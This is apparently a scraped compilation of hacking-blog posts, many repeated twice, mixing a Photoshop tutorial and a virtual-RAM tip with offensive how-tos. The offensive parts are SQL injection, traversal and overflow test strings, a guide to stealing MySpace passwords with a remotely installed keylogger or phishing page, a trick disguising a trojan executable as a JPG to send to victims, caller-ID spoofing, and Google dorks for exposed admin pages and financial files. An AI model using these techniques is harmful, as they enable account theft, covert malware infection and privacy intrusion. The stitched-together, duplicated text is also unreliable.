3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, etc.
We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:
http://website/inc/errors.asp?Error=Invalid%20password
This displays a custom access denied page that says, “Invalid password”. Seeing a string
on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:
http://website/inc/errors.asp?Error=
4) SQL Injection :- This kind of attack occurs when an attacker uses specially crafted SQL queries as an input, which can open up a database. Online forms such as login prompts, search enquiries, guest books, feedback forms, etc. are specially targeted.
The easiest test for the presence of a SQL injection attack is to append “or+1=1” to the URL and inspect the data returned by the server.
example:- http://www.domain.com/index.asp?querystring=sports' or 1=1--
The most common input validation attacks are as follows-
1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions.
To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.
Here’s the buffer test, calling on Perl from the command line:
$ echo –e “GET /login.php?user=\
> `perl –e ‘print “a” x 500’`\nHTTP/1.0\n\n” | \
nc –vv website 80
This sends a string of 500 “a” characters for the user value to the login.php file.
Buffer overflow can be tested by sending repeated requests to the application and recording the server's response.
2) Canonicalization :- These attacks target pages that use template files or otherwise reference alternate files on the web server. The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are targeted, something like following-
/menu.asp?dimlDisplayer=menu.asp
/webacc?User.asp=login.htt
/SWEditServlet?station_path=Z&publication_id=2043&template=login.tem
/Getfile.asp?/scripts/Client/login.js
/includes/printable.asp?Link=customers/overview.htm
3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, etc.
We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:
http://website/inc/errors.asp?Error=Invalid%20password
This displays a custom access denied page that says, “Invalid password”. Seeing a string
on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:
http://website/inc/errors.asp?Error=
4) SQL Injection :- This kind of attack occurs when an attacker uses specially crafted SQL queries as an input, which can open up a database. Online forms such as login prompts, search enquiries, guest books, feedback forms, etc. are specially targeted.
The easiest test for the presence of a SQL injection attack is to append “or+1=1” to the URL and inspect the data returned by the server.
example:- http://www.domain.com/index.asp?querystring=sports' or 1=1--
Increase Virtual RAM - To Make Your System Faster 100 percent works
Follow the steps given below :-
1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.
2) Click on the 'Advanced' tab.
3) Under 'Performance', click 'Settings'.
4) Then click the 'Advanced' tab on the button that pops up.
5) Under 'Virtual Memory' at the bottom, click 'Change'.
6) Click the 'Custom Size' button.
7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).
8) Click 'Set', and then exit out of all of the windows.
9) Finally, Restart your computer.
10) You now have a faster computer and 1-2GB of Virtual RAM..!
1) Hold down the 'Windows' Key and Press the 'Pause/Break' button at the top right of your keyboard.
Another way is Right-Clicking 'My Computer' and then Select 'Properties'.
2) Click on the 'Advanced' tab.
3) Under 'Performance', click 'Settings'.
4) Then click the 'Advanced' tab on the button that pops up.
5) Under 'Virtual Memory' at the bottom, click 'Change'.
6) Click the 'Custom Size' button.
7) For the initial size (depending on your HD space), type in anywhere from 1000-1500 (although I use 4000), and for the Maximum size type in anywhere from 2000-2500 (although I use 6000).
8) Click 'Set', and then exit out of all of the windows.
9) Finally, Restart your computer.
10) You now have a faster computer and 1-2GB of Virtual RAM..!
how Web 2.0 Logos Are Drawn in Photoshop ? Complete Tutorials and Plugins
Ever wonder how these guys draw their Web 2.0 Logos? Sometimes its nice to learn from others, build up the basic skills and start your own creativity from there. In this Photoshop tutorial, I’m going to reveal you some of the nice Web 2.0 logos, how you can draw their logo exactly the same (well, not really 100% though) with Photoshop.
1. Download And Install Style File
First of all, you will need to download a style I’ve created and load it into Photoshop.
1. Download Photoshop style here. (Right-click -> Save as)
2. For Photoshop CS2 users, put this style file into
“C:\Program Files\Adobe\Adobe Photoshop CS2\Presets\Styles”
Photoshop of other versions, put the file inside Presets\Styles
2. Load Style
Call up your Style Dialog box in Photoshop
1. Windows -> Styles
2. Notice a small arrow button on the top right corner. Click on it and select LoadStyles from the drop down
3. Find web2.0 from the list and clickLoad. If you don’t find web20, try closePhotoshop, re-open it repeat Step 1.
4. Click on the arrow button again and select large List of Drop Down
Your result should look something similar to the image on the right.
3. The Six Web 2.0 Logos
Here’s six Web 2.0 Logo; MyBlogLog, Imified, mixd, skype, Linked In and Go2Web20. The style you’ve just installed is going to reveal how to draw them. I’ll go through “mixd” and “Go2Web20” logos, the rest is just reusing the same technique.
4. How To Draw
The reason I use Style here is because once they are saved in to a .asl file (the file you downloaded) they are convenient to apply. Let’s go about drawing some of these logos.
Drawing mixd Logo
Initial observation, mixd logo consist of
1. “mixd” text
2. rounded rectangular
3. small dot
4. smaller dot
We will roughly draw them out in Photoshop, each elements in a different layer as illustrated in the image below.
Now here’s the the trick. Look for “mixd-label” in the Style Dialog. Drag them directly to background layer, small dot layer and smaller dot layer respectively. If you drag them correctly you will noticed that the layer will now inherits the colors and blending of the style. Find “mixd-font” in Style Dialog, drag it to the text layer and your mixd logo is complete, 90% like the original I’ll say.
Drawing Go2Web20 Logo
Have 4 new layers created, each for “GO“, “2“, “WEB” and “2.0“
Drag “go2web20-purple” from Style Dialog into “GO” & “WEB”, drag “go2web20-green” into “2″ & “2.0″ and you will get this final output.
As for the rest (MyBlogLog, imified, skype and Linked In), it’s all about dragging their respective style in and match with the correct font.
5. Conclusion
If you look into the Blending Options of each style, you will noticed that most Web 2.0 logos are matter of playing with gradients, strokes with the combination of the right fonts. This may not the “exact” way how these guys had done their logo, but its at least a way to achieve it. I’m not encouraging you to fake their style and redraw your logo, but try understand it and hopefully you can come out with a nice sleek web 2.0logo. I love putting my designs in Style (.asl), I can reuse them whenever I want.
THAT FINISHES THE TUTORIAL ON WEB LOGO's DESIGN USING PHOTOSHOPS...
1. Download And Install Style File
First of all, you will need to download a style I’ve created and load it into Photoshop.
1. Download Photoshop style here. (Right-click -> Save as)
2. For Photoshop CS2 users, put this style file into
“C:\Program Files\Adobe\Adobe Photoshop CS2\Presets\Styles”
Photoshop of other versions, put the file inside Presets\Styles
2. Load Style
Call up your Style Dialog box in Photoshop
1. Windows -> Styles
2. Notice a small arrow button on the top right corner. Click on it and select LoadStyles from the drop down
3. Find web2.0 from the list and clickLoad. If you don’t find web20, try closePhotoshop, re-open it repeat Step 1.
4. Click on the arrow button again and select large List of Drop Down
Your result should look something similar to the image on the right.
3. The Six Web 2.0 Logos
Here’s six Web 2.0 Logo; MyBlogLog, Imified, mixd, skype, Linked In and Go2Web20. The style you’ve just installed is going to reveal how to draw them. I’ll go through “mixd” and “Go2Web20” logos, the rest is just reusing the same technique.
4. How To Draw
The reason I use Style here is because once they are saved in to a .asl file (the file you downloaded) they are convenient to apply. Let’s go about drawing some of these logos.
Drawing mixd Logo
Initial observation, mixd logo consist of
1. “mixd” text
2. rounded rectangular
3. small dot
4. smaller dot
We will roughly draw them out in Photoshop, each elements in a different layer as illustrated in the image below.
Now here’s the the trick. Look for “mixd-label” in the Style Dialog. Drag them directly to background layer, small dot layer and smaller dot layer respectively. If you drag them correctly you will noticed that the layer will now inherits the colors and blending of the style. Find “mixd-font” in Style Dialog, drag it to the text layer and your mixd logo is complete, 90% like the original I’ll say.
Drawing Go2Web20 Logo
Have 4 new layers created, each for “GO“, “2“, “WEB” and “2.0“
Drag “go2web20-purple” from Style Dialog into “GO” & “WEB”, drag “go2web20-green” into “2″ & “2.0″ and you will get this final output.
As for the rest (MyBlogLog, imified, skype and Linked In), it’s all about dragging their respective style in and match with the correct font.
5. Conclusion
If you look into the Blending Options of each style, you will noticed that most Web 2.0 logos are matter of playing with gradients, strokes with the combination of the right fonts. This may not the “exact” way how these guys had done their logo, but its at least a way to achieve it. I’m not encouraging you to fake their style and redraw your logo, but try understand it and hopefully you can come out with a nice sleek web 2.0logo. I love putting my designs in Style (.asl), I can reuse them whenever I want.
THAT FINISHES THE TUTORIAL ON WEB LOGO's DESIGN USING PHOTOSHOPS...
How to Hack a MySpace Account
MySpace is one of the most widely used Social Networking website by many teenagers and adults acropss the globe. I have seen many cheaters create secret Myspace accounts in order to exchange messages with another person and have secret relationships. So, it’s no wonder many people want to know how to hack a Myspace account. In this post I’ll give you the real and working ways to hack a Myspace.
THINGS YOU SHOULD KNOW BEFORE PROCEEDING
With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.
1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. If you come accross a site that claims to sell a program to hack Myspace then it’s 100% scam.
2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. All the them are scams.
The following are the only 2 foolproof methods to hack Myspace.
1. HOW TO HACK MYSPACE – The Easiest Way
The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.
1. What is a keylogger?
A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.
2. Where is keylogger program available?
There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation.
1. HOW TO HACK MYSPACE – The Easiest Way
The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.
1. What is a keylogger?
A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.
2. Where is keylogger program available?
There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation.
http://www.sniperspy.com/
3. How to install a keylogger?
Keyloggers can be installed just like any other program. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. This is because, after installation the keylogger becomes completely invisible and start running in the background. Because of it’s stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer.
4. I don’t have physical access to the target computer, can I still use Sniperspy?
It doesn’t matter whether or not you have physical access to the victim’s computer.
Because SniperSpy offers Remote Installation Feature. So, you can hack Myspace remotely installing the keylogger on the target PC.
You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.
5. What if the target user (victim) refuses to run the attached file?
Sometimes the victim may refuse to run the attachment that you send via email because of suspicion.
6. How can a keylogger hack Myspace account?
You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.
In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.
7. Why SniperSpy is the best?
I have given a complete review of SniperSpy in my new post Which Spy Software to Choose. This should answer your question.
So what are you waiting for? Go grab it.
For a complete installation guide and more information on SniperSpy visit the following link:
http://www.sniperspy.com/
2. HOW TO HACK MYSPACE – Other Ways
Phishing
Phising is the most commonly used method to hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake Myspace page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her Myspace login details are stolen away.
Phishing is proved to be the most effective way to hack Myspace and also has high success rate. The reason for this is quite simple. The users are not aware of the phishing attack. Also the users are fooled, since the fake login pages imitate the appearance of the original pages. So, you may use the phishing technique to hack your friend’s MySpace account (just for fun). But you must have a detailed technical knowledge of HTML and server side scripting languages (php, perl etc.) to create a fake login page.
THINGS YOU SHOULD KNOW BEFORE PROCEEDING
With my experience of about 6 years in the field of Hacking and IT security, I can tell you that there are only TWO ways to hack a Myspace: They are Keylogging and Phishing. All the other ways are scams! Here is a list of facts about Myspace hacking.
1. There is no ready made software or program that can hack Myspace just by entering the target username or URL. If you come accross a site that claims to sell a program to hack Myspace then it’s 100% scam.
2. Never trust any Hacking Service that claims to hack a Myspace account just for $100 or $200. All the them are scams.
The following are the only 2 foolproof methods to hack Myspace.
1. HOW TO HACK MYSPACE – The Easiest Way
The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.
1. What is a keylogger?
A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.
2. Where is keylogger program available?
There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation.
1. HOW TO HACK MYSPACE – The Easiest Way
The easiest way to hack Myspace is by using a keylogger (Spy Software). It doesn’t matter whether or not you have physical access to the target computer. Hacking Myspace becomes just a cakewalk if you use a keylogger since it doesn’t need any technical knowledge. Anyone with a basic knowledge of computers can use keyloggers.
1. What is a keylogger?
A keylogger is a small program that monitors each and every keystroke that a user types on a specific computer’s keyboard. A keylogger is also called as a Spy software or Spy program.
2. Where is keylogger program available?
There exists tons of keyloggers on the internet, but most of them are useless and doesn’t turn out to be effective. But with my experience I recommend the following keylogger as the best to hack Myspce since it supports remote installation.
http://www.sniperspy.com/
3. How to install a keylogger?
Keyloggers can be installed just like any other program. At the installation time, you need to set your secret password and hotkey combination, to unhide the keylogger program whenever it is needed. This is because, after installation the keylogger becomes completely invisible and start running in the background. Because of it’s stealth behaviour the victim can never come to know about that the presence of the keylogger software on his/her computer.
4. I don’t have physical access to the target computer, can I still use Sniperspy?
It doesn’t matter whether or not you have physical access to the victim’s computer.
Because SniperSpy offers Remote Installation Feature. So, you can hack Myspace remotely installing the keylogger on the target PC.
You can attach the keylogger with any file such as image, MS excel file or other programs and send it to the victim via email. When the victim runs the file, it will automatically get installed without his knowledge and start recording every activity on his computer. The logs containing these activities are sent to you by the keylogger software via email or FTP.
5. What if the target user (victim) refuses to run the attached file?
Sometimes the victim may refuse to run the attachment that you send via email because of suspicion.
6. How can a keylogger hack Myspace account?
You can hack Myspace using keylogger as follows: You install the keylogger on a Remote PC (or on your local PC). The victim is unaware of the presence of the keylogger on his computer. As usual, he logs into his Myspace account by typing the Myspace username and password. These details are recorded and sent to your Sniperspy account. You can login to your Sniperspy account to see the password. Now you have successfully hacked the Myspace account.
In case if you install the keylogger on your local PC, you can obtain the recorded Myspace password just by unhiding the keylogger program.
7. Why SniperSpy is the best?
I have given a complete review of SniperSpy in my new post Which Spy Software to Choose. This should answer your question.
So what are you waiting for? Go grab it.
For a complete installation guide and more information on SniperSpy visit the following link:
http://www.sniperspy.com/
2. HOW TO HACK MYSPACE – Other Ways
Phishing
Phising is the most commonly used method to hack MySpace. The most widely used technique in phishing is the use of Fake Login Pages, also known as spoofed pages. These fake login pages resemble the original login pages of sites like Yahoo, Gmail, MySpace etc. The victim is fooled to believe the fake Myspace page to be the real one and enter his/her password. But once the user attempts to login through these pages, his/her Myspace login details are stolen away.
Phishing is proved to be the most effective way to hack Myspace and also has high success rate. The reason for this is quite simple. The users are not aware of the phishing attack. Also the users are fooled, since the fake login pages imitate the appearance of the original pages. So, you may use the phishing technique to hack your friend’s MySpace account (just for fun). But you must have a detailed technical knowledge of HTML and server side scripting languages (php, perl etc.) to create a fake login page.
Mobile hack to call your friends:
Hello Friends after "Make Free Phone Calls From PC to mobile for free" hack today I am
sahring With you a extremely Nice Prank or you can simply say Hack
i.e "How To Call Your Friends From THeir Own Cell Number".
I was asked by many Friends to Write Tutorials about mobile hacks and Pranks .
So I am Sharing My Second Mobile Extreme Prank With You all.
Enjoy and Have Fun And GO on Reading..
1. Go to http://www.mobivox.com and register there for free account.
2. During registration, remember to insert Victim mobile number in "Phone number" field as shown below.
3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".
4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.
5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.
That All The Full Tutorial . I think have Enjoyed It reading and Well Understood What to do?
If you are facing Any Problem Ask me I am there to help you Out . Enjoy and have Fun.
sahring With you a extremely Nice Prank or you can simply say Hack
i.e "How To Call Your Friends From THeir Own Cell Number".
I was asked by many Friends to Write Tutorials about mobile hacks and Pranks .
So I am Sharing My Second Mobile Extreme Prank With You all.
Enjoy and Have Fun And GO on Reading..
1. Go to http://www.mobivox.com and register there for free account.
2. During registration, remember to insert Victim mobile number in "Phone number" field as shown below.
3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".
4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.
5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.
That All The Full Tutorial . I think have Enjoyed It reading and Well Understood What to do?
If you are facing Any Problem Ask me I am there to help you Out . Enjoy and have Fun.
Hide EXE File into JPG
This is a good trick to hide your exe files into a jpg file..!
How about sending a trojan or a keylogger into your victim using this trick..??
1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.
2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)
3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'
4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5) Now create a shortcut of this 'picture.jpeg' in the same folder.
6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.
7) Go to properties (on file me.jpeg) and now you need to do some changes there.
8) First of all delete all the text on field 'Start In' and leave it empty.
9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'
10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.
11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.
12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.
13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.
14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.
16) So the best way to send these files together to someone is compress them into Zip or Rar.
17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.
How about sending a trojan or a keylogger into your victim using this trick..??
1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.
2) Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)
3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'
4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.
5) Now create a shortcut of this 'picture.jpeg' in the same folder.
6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.
7) Go to properties (on file me.jpeg) and now you need to do some changes there.
8) First of all delete all the text on field 'Start In' and leave it empty.
9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'
10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.
11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.
12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.
13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.
14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.
16) So the best way to send these files together to someone is compress them into Zip or Rar.
17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.
Hide Entire Drives Partition Without Registry
Here is a cool technique which hides entire hard disk drives by a simple procedure.
This is the best security tip to be employ against unauthorised users.
1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.
DISKPART>
2) Then type "list volume"
The result will look something like one as shown below-
http://www.insecure.in/images/hide_drive.gif
3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}
4) Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }
sometime it requires to reboot the computer.
Diskpart will remove the letter.
Windows XP is not having capabilty to identify the unknown volume.
Your Data is now safe from unauthorised users.
To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".
It means type "assign letter E".
This is the best security tip to be employ against unauthorised users.
1) Go to Start > Run > type "diskpart".
A DOS window will appear with following description.
DISKPART>
2) Then type "list volume"
The result will look something like one as shown below-
http://www.insecure.in/images/hide_drive.gif
3) Suppose you want to hide drive E then type "select volume 3"
Then a message will appear in same window { Volume 3 is the selected volume}
4) Now type "remove letter E"
Now a message will come { Diskpart Removed the Drive letter }
sometime it requires to reboot the computer.
Diskpart will remove the letter.
Windows XP is not having capabilty to identify the unknown volume.
Your Data is now safe from unauthorised users.
To access the content of hidden Drive repeat the process mentioned above. But in 4th step replace " remove" by "assign".
It means type "assign letter E".
How to Search for something perfectly in Google
Basic Operators:-
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- if we type "hacker+yahoo+science" in google search box and click search, it will reveal the results something which are related to all the three words simultaneously i.e. hacker, yahoo and science.
2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.
3) NOT :- It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like "google+hacking" NOT "security".
Advanced Operators:-
1) Intitle :- This operator searches within the title tags.
examples:- intitle:hacking returns all pages that have the string "hacking" in their title.
intitle:"index of" returns all pages that have string "index of" in their title.
Companion operator:- "allintitle".
2) Inurl :- Returns all matches, where url of the pages contains given word.
example:- inurl:admin returns all matches, where url of searched pages must contains the word "admin".
Companion operator:- "allinurl".
3) Site :- This operator narrows search to specific website. It will search results only from given domain. Can be used to carry out information gathering on specific domain.
example:- site:www.microsoft.com will find results only from the domain www.microsoft.com
4) Link :- This operator allows you to search for pages that links to given website.
example:- link:www.microsoft.com
Here, each of the searched result contains asp links to www.microsoft.com
5) Info :- This operator shows summary information for a site and provides links to other google searches that might pertain to that site.
example:- info:www.yahoo.com
6) Define :- This operator shows definition for any term.
example:- define:security
It gives various definitions for the word "security" in different manner from all over the world.
7) Filetype :- This operator allows us to search specific files on the internet. The supported file types can be pdf, xls, ppt, doc, txt, asp, swf, rtf, etc..
example:- If you want to search for all text documents presented on domain www.microsoft.com then we enter the query something like following.
"inurl:www.microsoft.com filetype:txt"
POPULAR SEARCH:
Google Search :- "Active Webcam Page" inurl:8080
Description- Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting.
Google Search :- "delete entries" inurl:admin/delete.asp
Description- AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.
Google Search :- "phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
Description- This search gives hundreds of existing curriculum vitae with names and address. An attacker could steal identity if there is an SSN in the document.
Google Search :- inurl:*.exe ext:exe inurl:/*cgi*/
Description- a cgi-bin executables xss/asp injection miscellanea: some examples: inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?
cmd=download&product=">[XSS HERE]
inurl:wa.exe ext:exe inurl:/*cgi*/ xss:
http://[target]/[path]/cgi-bin/wa.exe?SUBED1=">[XSS HERE] inurl:mqinterconnect.exe
ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?
poi1iconid=11111&poi1streetaddress=">[XSS HERE]
&poi1city=city&poi1state=OK
Google Search :- intitle:"index of" finance.xls
Description- Secret financial spreadsheets 'finance.xls' or 'finances.xls' of companies may revealed by this query.
Google Search :- intitle:"index.of" robots.txt
Description- The robots.txt file contains "rules" about where web spiders are allowed (and NOT allowed) to look in a website's directory structure. Without over-complicating things, this means that the robots.txt file gives a mini-roadmap of what's somewhat public and what's considered more private on a web site. Have a look at the robots.txt file itself, it contains interesting stuff. However, don't forget to check out the other files in these directories since they are usually at the top directory level of the web server!
Google Search :- intitle:index.of.admin
Description- Locate "admin" directories that are accessible from directory listings.
Google Search :- inurl:"nph-proxy.cgi" "start browsing"
Description- Returns lots of proxy servers that protects your identity online.
1) And (+) :- This operator is used to include multiple terms in a query which is to be searched in google.
example:- if we type "hacker+yahoo+science" in google search box and click search, it will reveal the results something which are related to all the three words simultaneously i.e. hacker, yahoo and science.
2 ) OR (|) :- The OR operator, represented by symbol( | ) or simply the word OR in uppercase letters, instructs google to locate either one term or another term in a query.
3) NOT :- It is opposite of AND operator, a NOT operator excludes a word from search.
example:- If we want to search websites containing the terms google and hacking but not security then we enter the query like "google+hacking" NOT "security".
Advanced Operators:-
1) Intitle :- This operator searches within the title tags.
examples:- intitle:hacking returns all pages that have the string "hacking" in their title.
intitle:"index of" returns all pages that have string "index of" in their title.
Companion operator:- "allintitle".
2) Inurl :- Returns all matches, where url of the pages contains given word.
example:- inurl:admin returns all matches, where url of searched pages must contains the word "admin".
Companion operator:- "allinurl".
3) Site :- This operator narrows search to specific website. It will search results only from given domain. Can be used to carry out information gathering on specific domain.
example:- site:www.microsoft.com will find results only from the domain www.microsoft.com
4) Link :- This operator allows you to search for pages that links to given website.
example:- link:www.microsoft.com
Here, each of the searched result contains asp links to www.microsoft.com
5) Info :- This operator shows summary information for a site and provides links to other google searches that might pertain to that site.
example:- info:www.yahoo.com
6) Define :- This operator shows definition for any term.
example:- define:security
It gives various definitions for the word "security" in different manner from all over the world.
7) Filetype :- This operator allows us to search specific files on the internet. The supported file types can be pdf, xls, ppt, doc, txt, asp, swf, rtf, etc..
example:- If you want to search for all text documents presented on domain www.microsoft.com then we enter the query something like following.
"inurl:www.microsoft.com filetype:txt"
POPULAR SEARCH:
Google Search :- "Active Webcam Page" inurl:8080
Description- Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting.
Google Search :- "delete entries" inurl:admin/delete.asp
Description- AspJar contains a flaw that may allow a malicious user to delete arbitrary messages. The issue is triggered when the authentication method is bypassed and /admin/delete.asp is accessed directly. It is possible that the flaw may allow a malicious user to delete messages resulting in a loss of integrity.
Google Search :- "phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
Description- This search gives hundreds of existing curriculum vitae with names and address. An attacker could steal identity if there is an SSN in the document.
Google Search :- inurl:*.exe ext:exe inurl:/*cgi*/
Description- a cgi-bin executables xss/asp injection miscellanea: some examples: inurl:keycgi.exe ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/keycgi.exe?
cmd=download&product=">[XSS HERE]
inurl:wa.exe ext:exe inurl:/*cgi*/ xss:
http://[target]/[path]/cgi-bin/wa.exe?SUBED1=">[XSS HERE] inurl:mqinterconnect.exe
ext:exe inurl:/*cgi*/ xss: http://[target]/[path]/cgi-bin/mqinterconnect.exe?
poi1iconid=11111&poi1streetaddress=">[XSS HERE]
&poi1city=city&poi1state=OK
Google Search :- intitle:"index of" finance.xls
